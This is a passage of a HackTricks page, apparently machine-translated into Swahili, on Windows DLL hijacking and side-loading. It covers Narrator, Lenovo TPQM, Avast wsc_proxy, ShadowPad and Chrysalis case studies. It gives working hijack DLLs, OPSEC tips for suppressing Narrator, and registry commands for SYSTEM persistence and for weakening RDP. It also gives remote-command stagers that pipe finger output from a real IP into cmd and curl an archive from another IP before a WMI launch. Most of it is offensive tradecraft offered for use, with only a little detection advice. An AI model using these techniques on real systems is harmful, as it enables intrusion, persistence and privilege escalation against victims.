#include<windows.h> #include<stdlib.h> #include<stdio.h>

void Entry (){ //Default function that is executed when the DLL is loaded system(“cmd”); }

BOOL APIENTRY DllMain (HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) { switch (ul_reason_for_call){ case DLL_PROCESS_ATTACH: CreateThread(0,0, (LPTHREAD_START_ROUTINE)Entry,0,0,0); break; case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: case DLL_PROCESS_DEATCH: break; } return TRUE; }

</details>

## Somo la Kesi: Narrator OneCore TTS Localization DLL Hijack (Accessibility/ATs)

Windows Narrator.exe bado inachunguza DLL ya localization yenye njia inayotegemezeka kwa lugha maalum wakati wa kuanza ambayo inaweza kufanywa hijack kwa arbitrary code execution and persistence.

Mambo muhimu
- Njia ya uchunguzi (matoleo ya sasa): `%windir%\System32\speech_onecore\engines\tts\msttsloc_onecoreenus.dll` (EN-US).
- Njia ya kale (matoleo ya zamani): `%windir%\System32\speech\engine\tts\msttslocenus.dll`.
- Ikiwa DLL inayoweza kuandikwa na inayodhibitiwa na attacker ipo katika njia ya OneCore, inapakiwa na `DllMain(DLL_PROCESS_ATTACH)` inaendesha. Hakuna exports zinahitajika.

Ugundaji kwa Procmon
- Kichujio: `Process Name is Narrator.exe` and `Operation is Load Image` or `CreateFile`.
- Anzisha Narrator na uangalie jaribio la kupakia njia iliyo hapo juu.

DLL ndogo
```c
// Build as msttsloc_onecoreenus.dll and place in the OneCore TTS path
BOOL WINAPI DllMain(HINSTANCE h, DWORD r, LPVOID) {
if (r == DLL_PROCESS_ATTACH) {
// Optional OPSEC: DisableThreadLibraryCalls(h);
// Suspend/quiet Narrator main thread, then run payload
// (see PoC for implementation details)
}
return TRUE;
}

OPSEC kimya

• Hijack rahisi itazungumza/kuangazia UI. Ili kubaki kimya, wakati wa kuambatisha orodha ya threads za Narrator, fungua thread kuu (OpenThread(THREAD_SUSPEND_RESUME)) na SuspendThread; endelea kwa thread yako mwenyewe. Angalia PoC kwa msimbo kamili.

Trigger and persistence via Accessibility configuration

• User context (HKCU): reg add "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Accessibility" /v configuration /t REG_SZ /d "Narrator" /f
• Winlogon/SYSTEM (HKLM): reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility" /v configuration /t REG_SZ /d "Narrator" /f
• Kwa yafuatayo, kuanzisha Narrator kutapakia DLL iliyowekwa. Kwenye secure desktop (logon screen), bonyeza CTRL+WIN+ENTER kuanzisha Narrator; DLL yako itatekelezwa kama SYSTEM kwenye secure desktop.

RDP-triggered SYSTEM execution (lateral movement)

• Allow classic RDP security layer: reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v SecurityLayer /t REG_DWORD /d 0 /f
• Fanya RDP kwa mwenyeji, kwenye logon screen bonyeza CTRL+WIN+ENTER kuanzisha Narrator; DLL yako itatekelezwa kama SYSTEM kwenye secure desktop.
• Utekelezaji unaisha wakati kikao cha RDP kinapofungwa—inject/migrate haraka.

Bring Your Own Accessibility (BYOA)

• Unaweza kukopa entry ya registry ya built-in Accessibility Tool (AT) (mfano CursorIndicator), uibadilishe ili ielekee kwenye binary/DLL yoyote, uiingize, kisha weka configuration kwa jina hilo la AT. Hii inafanya proxy ya utekelezaji wowote ndani ya mfumo wa Accessibility.

Vidokezo

• Kuandika chini ya %windir%\System32 na kubadilisha thamani za HKLM kunahitaji haki za admin.
• Mantiki yote ya payload inaweza kuishi katika DLL_PROCESS_ATTACH; hakuna exports zinazohitajika.

Case Study: CVE-2025-1729 - Privilege Escalation Using TPQMAssistant.exe

Mfano huu unaonyesha Phantom DLL Hijacking katika TrackPoint Quick Menu ya Lenovo (TPQMAssistant.exe), iliyofuatiliwa kama CVE-2025-1729.

Maelezo ya Udhaifu

• Komponenti: TPQMAssistant.exe located at C:\ProgramData\Lenovo\TPQM\Assistant\.
• Kazi Iliyopangwa: Lenovo\TrackPointQuickMenu\Schedule\ActivationDailyScheduleTask inakimbia kila siku saa 9:30 AM chini ya muktadha wa mtumiaji aliyesajiliwa.
• Directory Permissions: Writable by CREATOR OWNER, ikiruhusu watumiaji wa ndani kuweka faili yoyote.
• DLL Search Behavior: Inajaribu kupakia hostfxr.dll kutoka kwa directory yake ya kazi kwanza na inarekodi “NAME NOT FOUND” ikiwa haipo, ikionyesha upendeleo wa kutafuta kwenye directory ya ndani.

Utekelezaji wa Exploit

Mshambuliaji anaweza kuweka stub ya hostfxr.dll yenye madhara katika directory hiyo hiyo, akitumia DLL iliyokosekana kupata utekelezaji wa msimbo ndani ya muktadha wa mtumiaji:

#include <windows.h>

BOOL APIENTRY DllMain(HMODULE hModule, DWORD fdwReason, LPVOID lpReserved) {
if (fdwReason == DLL_PROCESS_ATTACH) {
// Payload: display a message box (proof-of-concept)
MessageBoxA(NULL, "DLL Hijacked!", "TPQM", MB_OK);
}
return TRUE;
}

Mtiririko wa Shambulio

1. Kama mtumiaji wa kawaida, weka hostfxr.dll katika C:\ProgramData\Lenovo\TPQM\Assistant\.
2. Subiri kazi iliyopangwa ifanye kazi saa 9:30 AM katika muktadha wa mtumiaji wa sasa.
3. Ikiwa msimamizi ameingia wakati kazi inapotekelezwa, DLL yenye madhara itaendesha katika kikao cha msimamizi kwa medium integrity.
4. Fanya mnyororo wa standard UAC bypass techniques ili kuinua kutoka medium integrity hadi SYSTEM privileges.

Uchambuzi wa Kesi: MSI CustomAction Dropper + DLL Side-Loading via Signed Host (wsc_proxy.exe)

Watendaji wa vitisho mara nyingi huunganisha MSI-based droppers na DLL side-loading ili kutekeleza payloads chini ya mchakato uliothibitishwa na kusainiwa.

Chain overview

• Mtumiaji anapakua MSI. A CustomAction inafanya kazi kimya wakati wa usakinishaji wa GUI (mfano, LaunchApplication au vitendo vya VBScript), ikijenga tena hatua inayofuata kutoka kwa rasilimali zilizojengwa ndani.
• The dropper inaandika EXE halali, iliyosainiwa na DLL yenye madhara kwa saraka ile ile (example pair: Avast-signed wsc_proxy.exe + attacker-controlled wsc.dll).
• When the signed EXE is started, Windows DLL search order loads wsc.dll from the working directory first, executing attacker code under a signed parent (ATT&CK T1574.001).

MSI analysis (what to look for)

• CustomAction table:
• Look for entries that run executables or VBScript. Example suspicious pattern: LaunchApplication executing an embedded file in background.
• In Orca (Microsoft Orca.exe), inspect CustomAction, InstallExecuteSequence and Binary tables.
• Embedded/split payloads in the MSI CAB:
• Administrative extract: msiexec /a package.msi /qb TARGETDIR=C:\out
• Or use lessmsi: lessmsi x package.msi C:\out
• Look for multiple small fragments that are concatenated and decrypted by a VBScript CustomAction. Common flow:

' VBScript CustomAction (high level)
' 1) Read multiple fragment files from the embedded CAB (e.g., f0.bin, f1.bin, ...)
' 2) Concatenate with ADODB.Stream or FileSystemObject
' 3) Decrypt using a hardcoded password/key
' 4) Write reconstructed PE(s) to disk (e.g., wsc_proxy.exe and wsc.dll)

Practical sideloading with wsc_proxy.exe

• Weka faili hizi mbili kwenye folda moja:
• wsc_proxy.exe: legitimate signed host (Avast). Mchakato unajaribu kupakia wsc.dll kwa jina kutoka kwa saraka yake.
• wsc.dll: attacker DLL. Ikiwa hakuna exports maalum zinazohitajika, DllMain inaweza kutosha; vinginevyo, tengeneza proxy DLL na peleka exports zinazohitajika kwa maktaba halisi wakati payload inakimbizwa katika DllMain.
• Jenga payload ndogo ya DLL:

// x64: x86_64-w64-mingw32-gcc payload.c -shared -o wsc.dll
#include <windows.h>
BOOL WINAPI DllMain(HINSTANCE h, DWORD r, LPVOID) {
if (r == DLL_PROCESS_ATTACH) {
WinExec("cmd.exe /c whoami > %TEMP%\\wsc_sideload.txt", SW_HIDE);
}
return TRUE;
}

• Kwa mahitaji ya export, tumia framework ya proxying (mfano, DLLirant/Spartacus) ili kuunda forwarding DLL ambayo pia inatekeleza payload yako.

• Mbinu hii inategemea utatuzi wa majina ya DLL na binary mwenyeji. Ikiwa mwenyeji anatumia absolute paths au safe loading flags (mfano, LOAD_LIBRARY_SEARCH_SYSTEM32/SetDefaultDllDirectories), hijack inaweza kushindwa.

• KnownDLLs, SxS, na forwarded exports zinaweza kuathiri kipaumbele na zinapaswa kuzingatiwa wakati wa kuchagua host binary na export set.

Triadi zilizotiwa sahihi + payload zilizofichwa (uchambuzi wa kesi ya ShadowPad)

Check Point ilielezea jinsi Ink Dragon inavyoweka ShadowPad kwa kutumia three-file triad ili mchanganyike na programu halali huku ikihifadhi core payload iliyofichwa kwenye diski:

1. Signed host EXE – vendors such as AMD, Realtek, or NVIDIA wanatumiwa (vncutil64.exe, ApplicationLogs.exe, msedge_proxyLog.exe). Wadukuzi wanarejesha jina la executable ili ionekane kama Windows binary (kwa mfano conhost.exe), lakini Authenticode signature inabaki kuwa halali.
2. Malicious loader DLL – inamezwa karibu na EXE kwa jina linalotarajiwa (vncutil64loc.dll, atiadlxy.dll, msedge_proxyLogLOC.dll). DLL hiyo kawaida ni MFC binary iliyofichwa kwa kutumia ScatterBrain framework; kazi yake pekee ni kutafuta encrypted blob, kuifungua, na reflectively map ShadowPad.
3. Encrypted payload blob – mara nyingi huhifadhiwa kama <name>.tmp katika saraka ile ile. Baada ya memory-mapping decrypted payload, loader huifuta faili ya TMP ili kuharibu ushahidi wa forensics.

Tradecraft notes:

• Kurejesha jina la EXE lililosainiwa (wakati ukihifadhi OriginalFileName ya asili kwenye PE header) kunaruhusu ikijifanya kuwa Windows binary lakini iwe na sahihi ya vendor, kwa hivyo rudia desturi ya Ink Dragon ya kuweka binaries zinazotokea conhost.exe ambazo kwa kweli ni utilities za AMD/NVIDIA.
• Kwa kuwa executable hubaki trusted, controls nyingi za allowlisting zinahitaji tu DLL yako hatari iwe kando yake. Lenga kubinafsisha loader DLL; signed parent kwa kawaida inaweza kukimbia bila kubadilishwa.
• ShadowPad decryptor inatarajia TMP blob iwe kando ya loader na iwe imeandikwa (writable) ili iweze kuisafisha kwa zero baada ya mapping. Hifadhi saraka iwe writable hadi payload ianze; mara ikipo kwenye memory, faili ya TMP inaweza kufutwa kwa usalama kwa OPSEC.

LOLBAS stager + staged archive sideloading chain (finger → tar/curl → WMI)

Operators wanachanganya DLL sideloading na LOLBAS ili kiini cha artefact maalum kwenye diski kiwe tu malicious DLL kando ya trusted EXE:

• Remote command loader (Finger): Hidden PowerShell inazaa cmd.exe /c, inavuta amri kutoka kwa Finger server, na kuzipipa kwa cmd:

powershell.exe Start-Process cmd -ArgumentList '/c finger Galo@91.193.19.108 | cmd' -WindowStyle Hidden

• finger user@host huvuta TCP/79 text; | cmd inatekeleza majibu ya server, ikimruhusu operator kuzungusha second stage server-side.

• Built-in download/extract: Pakua archive yenye extension isiyo hatari, ifungua, na stage sideload target pamoja na DLL chini ya kifolder kisichotabirika cha %LocalAppData%:

$base = "$Env:LocalAppData"; $dir = Join-Path $base (Get-Random); curl -s -L -o "$dir.pdf" 79.141.172.212/tcp; mkdir "$dir"; tar -xf "$dir.pdf" -C "$dir"; $exe = "$dir\intelbq.exe"

• curl -s -L inaficha progress na inafuata redirects; tar -xf inatumia tar built-in ya Windows.

• WMI/CIM launch: Anzisha EXE kupitia WMI ili telemetry ionyeshe process iliyoundwa na CIM wakati inapopakia DLL iliyo karibu nayo:

Invoke-CimMethod -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine = "`"$exe`""}

• Inafanya kazi na binaries zinazopendelea local DLLs (mfano, intelbq.exe, nearby_share.exe); payload (mfano, Remcos) huendeshwa chini ya jina lililoaminika.

• Hunting: Toa onyo/alert kuhusu forfiles wakati /p, /m, na /c zinaonekana pamoja; ni nadra nje ya scripts za admin.

Uchambuzi wa Kesi: NSIS dropper + Bitdefender Submission Wizard sideload (Chrysalis)

A recent Lotus Blossom intrusion ilitumia mnyororo wa update uliothibitishwa kupeleka NSIS-packed dropper ambao uli-stage DLL sideload pamoja na payloads zilizo kabisa kwenye memory.

Tradecraft flow

• update.exe (NSIS) huunda %AppData%\Bluetooth, huipa sifa ya HIDDEN, hunua Bitdefender Submission Wizard iliyorekebishwa BluetoothService.exe, log.dll hatari, na encrypted blob BluetoothService, kisha huanzisha EXE.
• Host EXE inaimport log.dll na inaita LogInit/LogWrite. LogInit inammap-load blob; LogWrite inaidecrypt kwa stream ya LCG ya custom (constants 0x19660D / 0x3C6EF35F, key material ikitokana na hash ya awali), inaandika juu buffer na shellcode ya plaintext, inaondoa temp, na inaruka/kuelekeza kwake.
• Ili kuepuka IAT, loader inatatua APIs kwa kuhash majina ya export kwa kutumia FNV-1a basis 0x811C9DC5 + prime 0x1000193, kisha kutumia Murmur-style avalanche (0x85EBCA6B) na kulinganisha dhidi ya salted target hashes.

Main shellcode (Chrysalis)

• Inaidecrypt module kuu kama PE kwa kurudia add/XOR/sub na key gQ2JR&9; kwa passes tano, kisha inaload kwa dynamic Kernel32.dll → GetProcAddress kukamilisha import resolution.
• Inajenga tena strings za majina ya DLL wakati wa runtime kupitia mabadiliko ya bit-rotate/XOR kwa kila tabia, kisha inaload oleaut32, advapi32, shlwapi, user32, wininet, ole32, shell32.
• Inatumia resolver ya pili inayopita kwenye PEB → InMemoryOrderModuleList, inachambua kila export table kwa block za 4-byte kwa Murmur-style mixing, na inarudi kwa GetProcAddress tu ikiwa hash haipatikani.

Embedded configuration & C2

• Config iko ndani ya faili iliyodondolewa BluetoothService kwa offset 0x30808 (size 0x980) na ime-RC4-decrypted kwa key qwhvb^435h&*7, ikifichua URL ya C2 na User-Agent.
• Beacons hujenga profile ya host iliyogawanywa kwa dots, huongeza tag 4Q mbele, kisha hu-RC4-encrypt kwa key vAuig34%^325hGV kabla ya HttpSendRequestA juu ya HTTPS. Majibu hu-RC4-decrypt na kusambazwa na tag switch (4T shell, 4V process exec, 4W/4X file write, 4Y read/exfil, 4\\ uninstall, 4 drive/file enum + chunked transfer cases).
• Mode ya utekelezaji imewekwa kwa CLI args: hakuna args = install persistence (service/Run key) inayorejelea -i; -i inarelaunch self na -k; -k inaruka install na inaendesha payload.

Alternate loader observed

• Intrusion ile ile iliweka Tiny C Compiler na ikatekeleza svchost.exe -nostdlib -run conf.c kutoka C:\ProgramData\USOShared\, na libtcc.dll pembeni yake. Source ya C iliyotolewa na mwadukuzi iliingiza shellcode, ikaanzishwa na kukimbizwa kwenye memory bila kugusa diski na PE. Replicate with:

C:\ProgramData\USOShared\tcc.exe -nostdlib -run conf.c

• Hatua hii ya compile-and-run inayotegemea TCC iliingiza Wininet.dll wakati wa utekelezaji na kuvuta shellcode ya awamu ya pili kutoka kwenye URL iliyowekwa moja kwa moja, ikitoa loader yenye kubadilika inayojifanya kuwa utekelezaji wa compiler.

Marejeo

• Red Canary – Intelligence Insights: January 2026
• CVE-2025-1729 - Privilege Escalation Using TPQMAssistant.exe
• Microsoft Store - TPQM Assistant UWP
• https://medium.com/@pranaybafna/tcapt-dll-hijacking-888d181ede8e
• https://cocomelonc.github.io/pentest/2021/09/24/dll-hijacking-1.html
• Check Point Research – Nimbus Manticore Deploys New Malware Targeting Europe
• TrustedSec – Hack-cessibility: When DLL Hijacks Meet Windows Helpers
• PoC – api0cradle/Narrator-dll
• Sysinternals Process Monitor
• Unit 42 – Digital Doppelgangers: Anatomy of Evolving Impersonation Campaigns Distributing Gh0st RAT
• Check Point Research – Inside Ink Dragon: Revealing the Relay Network and Inner Workings of a Stealthy Offensive Operation
• Rapid7 – The Chrysalis Backdoor: A Deep Dive into Lotus Blossom’s toolkit
• 0xdf – HTB Bruno ZipSlip → DLL hijack chain

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

• Angalia mpango wa usajili!
• Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
• Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.